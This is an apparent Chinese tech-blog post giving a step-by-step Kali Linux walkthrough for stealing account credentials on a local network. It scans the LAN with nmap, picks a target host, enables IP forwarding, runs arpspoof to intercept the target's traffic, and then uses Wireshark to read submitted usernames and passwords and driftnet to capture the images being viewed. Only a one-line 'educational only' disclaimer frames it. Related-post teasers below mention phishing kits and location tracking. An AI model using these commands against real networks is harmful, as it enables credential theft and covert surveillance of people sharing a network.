kali linux 获取ip_kali内网渗透之盗取用户账号信息

最新推荐文章于 2026-04-07 09:54:52 发布
原创 最新推荐文章于 2026-04-07 09:54:52 发布 · 4.3k 阅读 · 32 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#kali linux 获取ip
本文介绍了如何使用Kali Linux进行内网渗透,通过查看IP和网卡信息、使用nmap扫描目标主机、执行ARP欺骗以及利用Wireshark捕获数据包,详细展示了如何盗取内网中其他设备的账号信息。同时提醒读者,此类技术仅用于教育目的,禁止非法使用,网络安全人人有责。

c49b3ed4d79674c14a24e0d79682a7a9.png

kali内网渗透之盗取用户账号信息(使用的是kali-linux-2020-1a)

一、查看一下自己的ip地址以及网卡信息和子网掩码,可以看到本机的ip地址为192.168.1.109,网卡为eth0

sudo ifconfig

21252773b56f5802daf308ad97b5efc8.png

二、利用nmap工具扫描同一局域网内的主机并选择攻击目标,这里我们选择我的另一台电脑 192.168.1.101

nmap -sP 192.168.1.0/24

77c57a12c31eb3edfc50f987241a3d21.png

三、利用ARP欺骗让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我。

1、在进行arp欺骗之前,我们要先开启本机的IP转发功能,如果不开启的话,我们攻击之后会使目标机断网,而不是欺骗。

echo 1 > /proc/sys/net/ipv4/ip_forward

b82f23a05f5b8e48a469a4d1dccbf699.png

2、对目标主机进行欺骗,如果没有arpspoof可以使用sudo apt-get install dsniff 安装

sudo apt-get install dsniff
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1

68616f8d5025d7a90b2ee73872c639b9.png

四、使用wireshark抓取经过本机eth0网卡的数据包

2af306e4600c7e43a25ff64a5f400b6f.png

fa279a2afc78944a4d67584efca3f5c2.png

五、当被攻击主机访问网站输入用户密码可以在wireshark中找到对应的数据包并取得用户名密码

ac150057bc40c4efb10a6fc30f82702f.png

d26a381ddcff69dae3ff10ad0210a3bf.png

六、另外做了内网欺骗后还可以截取到目标主机上浏览的图片,是不是很赞!

driftnet -i eth0

69ce1abf4f24743415e19980202e1d53.png

最后,此文只是向大家展示一下内网渗透的相关过程,任何人不得用于违法犯罪,否则与本人无关,安全上网,人人有责。

孙叔敖夜
关注
kali获取任意设备的位置信息
ztK63LrD的博客
04-23 7252
kali获取位置信息
kali下使用seek追踪定位IP地址(渗透笔记)
weixin_43899811的博客
11-27 5287
在整个实验中,最头疼最无语的还是一开始kali版本选择上的问题,一定要选择kali2023,并且在清华大学镜像源中下载镜像。作为攻击者,我认为这种攻击方式还需要再进一步完善社工方面的问题,例如如何实现手机不提示开启位置功能,如何实现苹果端显示位置,如何不提示该网址是伪装网址等等,值得我们考虑和深思。作为被攻击者,我们一定在日常使用互联网中,不要随意打开陌生链接!那么最后,着重强调:此篇文章仅供技术交流和探讨,严禁利用该手段进行违法行为,出现一切问题后果自负!不足之处敬请批评指正!
使用Kali Linux中的ARP欺骗技术实现局域网流量监控
最新发布
weixin_42531516的博客
04-07 205
本文详细介绍了如何使用Kali Linux中的ARP欺骗技术实现局域网流量监控,包括ARP欺骗原理、环境配置、实战操作步骤及防御措施。通过Kali Linux工具如arpspoof和Wireshark,用户可以在授权环境下进行网络流量分析,同时强调了法律与道德边界。
使用kali-linux进行被动扫描
zhuo20020111的博客
06-28 409
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版。
kali Linux:利用漏洞获取目标主机的IP地址
weixin_58023816的博客
12-10 3662
【代码】kali Linux:利用漏洞获取目标主机的IP地址。
kali中常见的三种扫描
m0_73451082的博客
07-10 4950
kali中输入 192.168.56.0/24 -sS -sV的思是扫描192.137.56这个网段下的存活ip地址的数量。在kali中输入ping 192.168.56.131 -c 4 的意思是192.168.56.131 这个IP 扫描四次。在kali中输入 192.168.56.131 -sS -sV的思是扫描对应ip的电脑的全部信息。​第一步 确保要扫描的电脑和执行扫描的电脑是否在同一个网段上。Kali里面查看ip地址的命令为ifconfig。
kali扫描内网ip_kali内网渗透盗取用户账号信息
weixin_31361715的博客
12-23 1880
kali内网渗透盗取用户账号信息(使用的是kali-linux-2020-1a)一、查看一下自己的ip地址以及网卡信息和子网掩码,可以看到本机的ip地址为192.168.1.109,网卡为eth0sudo ifconfig二、利用nmap工具扫描同一局域网内的主机并选择攻击目标,这里我们选择我的另一台电脑 192.168.1.101nmap -sP 192.168.1.0/24三、利用ARP欺骗...
kali下钓鱼网站的制作
热门推荐
飞鱼的企鹅的博客
08-31 2万+
尽管当今互联网的安全措施已经很完善,但是还是会出现“被盗号”的情况,很多情况下是“有心人”的钓鱼网站导致的,今天的文章主要讲一下kali下使用setoolkit来制作钓鱼网站。 setoolkit简介 setoolkit是kali下的社会工程学工具集,有很多功能,在命令行输入setoolkit 有几个选项 社会工程学攻击 快速追踪测试 第三方模块 升级软件 升级配置 帮助 这里我们选择1,...
运用Kali Linux对靶机进行简单提权(计划任务、sudo滥用和Python建立反弹shell连接)
Xinghaoyang666的博客
08-02 1916
本篇文章仅具有教学意义,测试环境为内网虚拟机(Kali Linux)对靶机(DarkHole2)渗透,如有不法分子使用此文章的内容命令对公网进行渗透,与本文章作者无关,如有发现,请及时举报。
中职网络安全竞赛之“湖南省赛”数据包解析
txphn的博客
07-20 1547
2021年湖南省网络安全技能竞赛任务书之数据包解析
靶机16 GROTESQUE: 2
honest_gg的博客
10-12 1522
简介:获取标志(难度: 中等)
kali linux查看局域网下所有IP,并对指定IP攻击
weixin_44145452的博客
08-18 5742
因为自己的小米手机也连接到了同一个wifi下面,所以正好发现这里所嗅探到的ip地址:192.168.1.136是我手机的ip地址,与其刚好符合。kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击。前面的ip地址是手机的ip地址,后面的那个ip地址是手机的默认网关地址。来确认本机的ip地址。这样这个攻击就停止了。
侦查系列之微信用链接查看对方IP(包括机型、系统版本等信息)
Websec
03-22 2万+
MaiTube可以快速的将某个链接进行套装重定向。比如用 A链接指向B链接,而B链接是目标链接。当A链接打开的时候,迅速的进行打开行为的记录,然后快速的帮助用户指向B链接。打开行为通常包括 “打开的浏览器”,“ip地址”,“时区”。某些网站声称可以追踪电池电量,CPU型号等。但是无法记录MAC地址。 链接生成页面 如果你在输入完整的链接地址栏里输入的是百度的网址,那么对方打开可追踪链接或者扫描二维码会跳转到百度的页面,仍然
Kali 使用nmap命令进行局域网扫描
Promise_Code的博客
09-22 2万+
1.内网IP地址扫描 sudo -i namp -sP 192.168.1.0/24 (P一定要大写,192.168.1.0是自己内网的网络号加子网号,和为0的主机号) 2端口扫描 sudo -i namp -sT 192.168.1.101 (T一定要大写,192.168.1.101是自己要扫描的设备的内网ip地址) 3.隐藏扫描端口(不容易被主机发现) nmap -sS 192.168.1.102 4.UDP端口扫描 nmap -sU 192.168.1.109 5.操作系统识别 nma
kali工具fping的简单使用之扫描IP
weixin_51685970的博客
03-15 1万+
相信大家都有所耳闻,kali是黑客必不可少的工具,其功能之强大,咱们也不多说,那么下面咱们简单的使用一下里面的fping功能有何妙用。 场景:某管理员需要统计局域网内那些IP正在使用 fping妙用一:扫描局域网活动IP 第一步:打开kali(本文用虚拟机讲述),将kali与物理机配置成桥接模式,目的使虚拟机能与局域网相通信:点击虚拟机-设置-网络适配器-桥接模式-确认-编辑-虚拟网路编辑器 第二步:以上步骤完成后查看虚拟机获取IP是否与局域网IP同一网段:命令ifconfi..
kali下使用seek追踪定位IP地址(渗透笔记)_如何通过链接获取他人ip
2301_79099373的博客
04-07 1580
下载完成后,同样解压到当前文件夹。
kali linux获取qq密码,Kali Linux(64位)安装QQ
weixin_34303763的博客
04-30 5348
由于kali Linux是新发布的系统,很多技术相关的文章都还没发布,一些基本地程序安装都没完善,本人自己找了个Kali Linux安装QQ的文章,测试了一遍确实可行,总结了一些经验写在这里。 ps:实在受不了那Web QQ,用起来真不爽!!!! 1.由于我使用的是64位的系统,而运行Wine兼容层QQ需要32位的库文件,众所周知,QQ是没有发布64位版本的QQ的,而且那么久的时间没有更新,因此要...
渗透测试】基于Kali Linux信息收集(Information Gathering)指令介绍
m0_38096164的博客
09-29 1419
基于Kali linux信息收集(information gathering)指令介绍
kali arp-scan网络扫描工具 扫描局域网ip地址
有勇气的牛排博客
07-21 7510
1 arp-scan 简介 arp-scan 是一款轻量级的arp扫描工具,会解析mac地址,就是想局域网中所有可能的ip地址发出arp请求包,如果得到arp回应,就证明了局域网中某天主机使用了该ip。 对于目标主机可以指定IP地址or主机名,可以是网段,指定一个地址范围、指定主机和子网掩码。 2 安装 2.1centos 运行git clone https://github.com/royhills/arp-scan.git获取最新项目源码 运行cd arp-scan进入源码目录 运行autorecon
Kali使用Netdiscover探测局域网中存活主机
wxqndm的博客
09-20 1万+
被动模式:被动模式的方法更加隐蔽,但是速度会比较慢,网卡被设置为混杂模式来侦听网络内的arp数据包进行被动式探测,这种方式就需要网络内设备发送arp包才能被探测到。使用Netdiscover工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求。IP地址是192.168.2.0网段,子网掩码是255.255.255.0,3个255的掩码位是24(需要网络知识基础)主动模式:主动模式顾名思义就是主动的探测发现网络内主机,但是这种方式往往会引起网络管理员的注意。按住 ctrl+c结束运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值